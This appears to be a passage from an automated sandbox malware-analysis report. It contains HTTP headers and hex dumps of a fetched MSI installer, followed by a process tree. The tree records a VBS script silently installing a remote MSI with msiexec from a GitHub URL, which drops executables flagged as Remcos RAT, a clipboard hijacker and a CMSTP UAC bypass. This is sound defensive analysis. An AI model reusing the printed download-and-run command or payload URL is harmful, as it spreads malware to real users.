                                                                                                              Cache-Control: max-age=300
                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                              Content-Type: application/octet-stream
                                                                                                              ETag: "357de5659fc40639dda25e915763abf767dbd94e90964d843e25ac9b54d49809"
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Frame-Options: deny
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              X-GitHub-Request-Id: 41F0:116B33:6BF36:7BED5:674A5B60
                                                                                                              Accept-Ranges: bytes
                                                                                                              Date: Sat, 30 Nov 2024 00:25:05 GMT
                                                                                                              Via: 1.1 varnish
                                                                                                              X-Served-By: cache-nyc-kteb1890083-NYC
                                                                                                              X-Cache: MISS
                                                                                                              X-Cache-Hits: 0
                                                                                                              X-Timer: S1732926305.950255,VS0,VE152
                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                              X-Fastly-Request-ID: cdaa79fe786ed87f54181a4b5a60caa61a264d2f
                                                                                                              Expires: Sat, 30 Nov 2024 00:30:05 GMT
                                                                                                              Source-Age: 0
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 37 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 48 00 00 00 d2 00 00 00 64 01 00 00 f8 01 00 00 71 02 00 00 f5 02 00 00 0f 03 00 00 10 03 00 00 11 03 00 00 12 03 00 00 13 03 00 00 14 03 00 00 15 03 00 00 16 03 00 00 72 07 00 00 09 00 00 00 54 08 00 00 55 08 00 00 56 08 00 00 57 08 00 00 58 08 00 00 59 08 00 00 5a 08 00 00 5b 08 00 00 5c 08 00 00 5d 08 00 00 5e 08 00 00 5f 08 00 00 60 08 00 00 61 08 00 00 62 08 00 00 63 08 00 00 64 08 00 00 65 08 00 00 66 08 00 00 67 08 00 00 68 08 00 00 69 08 00 00 6a 08 00 00 6b 08 00 00 6c 08 00 00 6d 08 00 00 6e 08 00 00 6f 08 00
                                                                                                              Data Ascii: >7HdqrTUVWXYZ[\]^_`abcdefghijklmno
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 00 00 00 48 00 00 00 00 00 00 00 40 48 7f 3f 64 41 2f 42 36 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 02 01 3c 00 00 00 32 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00 4c 00 00 00 00 00 00 00 40 48 3f 3b f2 43 38 44 b1 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: H@H?dA/B6H<2L@H?;C8DE
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 6b 00 6b 00 6b 00 6b 00 6e 00 6e 00 6e 00 6e 00 6e 00 6e 00 72 00 72 00 72 00 74 00 74 00 74 00 74 00 74 00 79 00 79 00 7b 00 7b 00 7b 00 7b 00 7f 00 7f 00 80 00 80 00 a4 00 a4 00 a4 00 a4 00 ab 00 ab 00 ab 00 ab 00 ab 00 ab 00 b3 00 b3 00 f1 00 f1 00 f1 00 f2 00 f2 00 f2 00 f3 00 f3 00 f3 00 f4 00 f4 00 f7 00 f7 00 f7 00 f7 00 fa 00 fa 00 fa 00 fa 00 fa 00 0d 01 0d 01 0d 01 0d 01 0d 01 0d 01 0d 01 0d 01 0d 01 20 01 20 01 23 01 23 01 23 01 23 01 23 01 23 01 23 01 01 80 02 80 03 80 04 80 05 80 06 80 01 80 02 80 03 80 01 80 02 80 03 80 01 80 02 80 01 80 02 80 01 80 02 80 03 80 04 80 05 80 06 80 07 80 08 80 09 80 0a 80 01 80 02 80 03 80 01 80 02 80 03 80 01 80 02 80 03 80 01 80 02 80 03 80 04 80 05 80 06 80 01 80 02 80 03 80 04 80 05 80 06 80 07 80 08 80 09
                                                                                                              Data Ascii: kkkknnnnnnrrrtttttyy{{{{ #######
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 2d 00 3f 01 9d 02 d4 03 e0 03 ef 03 f1 03 f4 03 f7 03 f9 03 fb 03 fd 03 ff 03 02 04 04 04 06 04 08 04 0b 04 0c 04 0e 04 0f 04 10 04 11 04 13 04 d2 80 d2 80 01 80 33 80 01 80 41 80 01 80 41 81 33 80 13 80 41 80 41 80 41 80 33 80 01 80 33 80 33 81 33 81 33 80 33 80 33 80 33 80 33 80 33 80 01 80 2a 00 2d 00 a3 02 0d 04 a3 02 a3 02 a3 02 a3 02 f5 03 00 00 a3 02 a3 02 a3 02 00 04 a3 02 05 04 24 00 09 04 09 03 b5 03 bb 03 b5 03 b7 03 ba 03 a3 02 00 00 00 00 12 04 65 01 f3 03 03 04 f0 03 f2 03 f6 03 f8 03 fa 03 fc 03 fe 03 01 04 02 04 39 01 07 04 0a 04 39 01 ce 03 65 01 65 01 65 01 65 01 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: -*-?3AA3AAA3333333333*-$e99eeee
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff 7b 08 00 00 7c 08 00 00 7d 08 00 00 7e 08 00 00 7f 08 00 00 80 08 00 00 41 74 74 72 69 62 75 74 65 73 50 61 74 63 68 53 69 7a 65 46 69 6c 65 5f 50 61 74 63 68 54 79 70 65 41 63 74 69 6f 6e 43 6f 6e 64 69 74 69 6f 6e 53 65 71 75 65 6e 63 65 43 6f 73 74 46 69 6e 61 6c 69 7a 65 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 54 61 62 6c 65 4e 61 6d 65 49 6e 73 74 61 6c 6c 46 69 6e 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 49 6e 69 74 69 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 56 61 6c 69 64
                                                                                                              Data Ascii: {|}~AttributesPatchSizeFile_PatchTypeActionConditionSequenceCostFinalizeCostInitializeTableNameInstallFinalizeInstallInitializeInstallValid
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 77 69 74 68 69 6e 20 61 20 64 69 61 6c 6f 67 2c 20 62 75 74 20 63 61 6e 20 72 65 70 65 61 74 20 6f 6e 20 64 69 66 66 65 72 65 6e 74 20 64 69 61 6c 6f 67 73 2e 20 54 68 65 20 74 79 70 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 50 61 72 65 6e 74 50 61 72 65 6e 74 20 63 6f 6e 74 72 6f 6c 2c 20 69 66 20 69 74 20 68 61 73 20 6f 6e 65 2e 41 20 33 32 2d 62 69 74 20 77 6f 72 64 20 74 68 61 74 20 73 70 65 63 69 66 69 65 73 20 74 68 65 20 61 74 74 72 69 62 75 74 65 20 66 6c 61 67 73 20 74 6f 20 62 65 20 61 70 70 6c 69 65 64 20 74 6f 20 74 68 69 73 20 63 6f 6e 74 72 6f 6c 2e 44 61 74 61 46 6f 72 6d 61 74 74 65 64 45 78 74 65 6e 64 65 64 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 65 78 74 65 6e 64 65 64 20 63 6f 6e 74 72 6f 6c 54 65
                                                                                                              Data Ascii: within a dialog, but can repeat on different dialogs. The type of the control.ParentParent control, if it has one.A 32-bit word that specifies the attribute flags to be applied to this control.DataFormattedExtended information about the extended controlTe
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 6e 74 20 72 65 63 6f 72 64 2e 45 78 70 72 65 73 73 69 6f 6e 20 65 76 61 6c 75 61 74 65 64 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 69 66 20 4c 65 76 65 6c 20 69 6e 20 74 68 65 20 46 65 61 74 75 72 65 20 74 61 62 6c 65 20 69 73 20 74 6f 20 63 68 61 6e 67 65 2e 41 20 63 6f 6e 64 69 74 69 6f 6e 61 6c 20 73 74 61 74 65 6d 65 6e 74 20 74 68 61 74 20 77 69 6c 6c 20 64 69 73 61 62 6c 65 20 74 68 69 73 20 63 6f 6d 70 6f 6e 65 6e 74 20 69 66 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 63 6f 6e 64 69 74 69 6f 6e 20 65 76 61 6c 75 61 74 65 73 20 74 6f 20 74 68 65 20 27 54 72 75 65 27 20 73 74 61 74 65 2e 20 49 66 20 61 20 63 6f 6d 70 6f 6e 65 6e 74 20 69 73 20 64 69 73 61 62 6c 65 64 2c 20 69 74 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 69 6e 73 74 61 6c 6c 65 64 2c
                                                                                                              Data Ascii: nt record.Expression evaluated to determine if Level in the Feature table is to change.A conditional statement that will disable this component if the specified condition evaluates to the 'True' state. If a component is disabled, it will not be installed,
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 20 61 73 20 74 68 65 20 76 61 6c 75 65 2e 53 69 7a 65 54 68 65 20 73 69 7a 65 20 6f 66 20 74 68 65 20 66 6f 6e 74 20 75 73 65 64 2e 20 54 68 69 73 20 73 69 7a 65 20 69 73 20 67 69 76 65 6e 20 69 6e 20 6f 75 72 20 75 6e 69 74 73 20 28 31 2f 31 32 20 6f 66 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 68 65 69 67 68 74 29 2e 20 41 73 73 75 6d 69 6e 67 20 74 68 61 74 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 69 73 20 73 65 74 20 74 6f 20 31 32 20 70 6f 69 6e 74 20 73 69 7a 65 2c 20 74 68 69 73 20 69 73 20 65 71 75 69 76 61 6c 65 6e 74 20 74 6f 20 74 68 65 20 70 6f 69 6e 74 20 73 69 7a 65 2e 43 6f 6d 70 6f 6e 65 6e 74 49 64 47 75 69 64 41 20 73 74 72 69 6e 67 20 47 55 49 44 20 75 6e 69 71 75 65 20 74 6f 20 74 68 69 73 20 63 6f 6d 70 6f 6e 65 6e
                                                                                                              Data Ascii: as the value.SizeThe size of the font used. This size is given in our units (1/12 of the system font height). Assuming that the system font is set to 12 point size, this is equivalent to the point size.ComponentIdGuidA string GUID unique to this componen
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 6c 2e 20 41 20 73 74 72 69 6e 67 20 75 73 65 64 20 74 6f 20 73 65 74 20 74 68 65 20 69 6e 69 74 69 61 6c 20 74 65 78 74 20 63 6f 6e 74 61 69 6e 65 64 20 77 69 74 68 69 6e 20 61 20 63 6f 6e 74 72 6f 6c 20 28 69 66 20 61 70 70 72 6f 70 72 69 61 74 65 29 2e 43 6f 6e 74 72 6f 6c 5f 4e 65 78 74 54 68 65 20 6e 61 6d 65 20 6f 66 20 61 6e 20 6f 74 68 65 72 20 63 6f 6e 74 72 6f 6c 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 64 69 61 6c 6f 67 2e 20 54 68 69 73 20 6c 69 6e 6b 20 64 65 66 69 6e 65 73 20 74 68 65 20 74 61 62 20 6f 72 64 65 72 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 2e 20 54 68 65 20 6c 69 6e 6b 73 20 68 61 76 65 20 74 6f 20 66 6f 72 6d 20 6f 6e 65 20 6f 72 20 6d 6f 72 65 20 63 79 63 6c 65 73 21 48 65 6c 70 54 68 65 20 68 65 6c 70 20 73 74 72 69 6e
                                                                                                              Data Ascii: l. A string used to set the initial text contained within a control (if appropriate).Control_NextThe name of an other control on the same dialog. This link defines the tab order of the controls. The links have to form one or more cycles!HelpThe help strin
                                                                                                              2024-11-30 00:25:05 UTC1378INData Raw: 74 79 70 65 2c 20 63 6f 6e 73 69 73 74 69 6e 67 20 6f 66 20 73 6f 75 72 63 65 20 6c 6f 63 61 74 69 6f 6e 2c 20 63 6f 64 65 20 74 79 70 65 2c 20 65 6e 74 72 79 2c 20 6f 70 74 69 6f 6e 20 66 6c 61 67 73 2e 53 6f 75 72 63 65 43 75 73 74 6f 6d 53 6f 75 72 63 65 54 68 65 20 74 61 62 6c 65 20 72 65 66 65 72 65 6e 63 65 20 6f 66 20 74 68 65 20 73 6f 75 72 63 65 20 6f 66 20 74 68 65 20 63 6f 64 65 2e 45 78 74 65 6e 64 65 64 54 79 70 65 54 68 65 20 6e 75 6d 65 72 69 63 20 63 75 73 74 6f 6d 20 61 63 74 69 6f 6e 20 74 79 70 65 20 69 6e 66 6f 20 66 6c 61 67 73 2e 4e 61 6d 65 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 2e 4d 69 6e 69 6d 75 6d 20 76 61 6c 75 65 20 61 6c 6c 6f 77 65 64 48 43 65 6e 74 65 72 69 6e 67 48 6f 72 69 7a 6f 6e 74 61 6c 20 70 6f 73 69 74 69 6f 6e
                                                                                                              Data Ascii: type, consisting of source location, code type, entry, option flags.SourceCustomSourceThe table reference of the source of the code.ExtendedTypeThe numeric custom action type info flags.Name of the dialog.Minimum value allowedHCenteringHorizontal position


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:19:24:53
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\secondaryTask.vbs"
                                                                                                              Imagebase:0x7ff72a210000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:19:24:58
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qn
                                                                                                              Imagebase:0x7ff683cd0000
                                                                                                              File size:69'632 bytes
                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:19:24:58
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                              Imagebase:0x7ff683cd0000
                                                                                                              File size:69'632 bytes
                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:5
                                                                                                              Start time:19:25:10
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 9BBAE1314E73A4B36581DE9B4621B078
                                                                                                              Imagebase:0x210000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:19:25:11
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:19:25:11
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\Updwork.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Updwork.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:506'816 bytes
                                                                                                              MD5 hash:253C52411B256E4AF301CBA58DCB6CEF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 37%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:19:25:12
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2390138149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:9
                                                                                                              Start time:19:25:12
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:15
                                                                                                              Start time:19:25:22
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:16
                                                                                                              Start time:19:25:22
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:19:25:22
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:20
                                                                                                              Start time:19:25:31
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WerFault.exe"
                                                                                                              Imagebase:0x70000
                                                                                                              File size:483'680 bytes
                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:false

                                                                                                              Target ID:22
                                                                                                              Start time:19:25:42
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:506'816 bytes
                                                                                                              MD5 hash:253C52411B256E4AF301CBA58DCB6CEF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              Target ID:23
                                                                                                              Start time:19:25:51
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2755135882.0000000000472000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2755264970.000000000047B000.00000004.00000001.01000000.00000000.sdmp, Author: unknown
                                                                                                              Has exited:true

                                                                                                              Target ID:24
                                                                                                              Start time:19:25:56
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              Target ID:25
                                                                                                              Start time:19:25:56
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2833446992.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              Target ID:26
                                                                                                              Start time:19:25:56
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
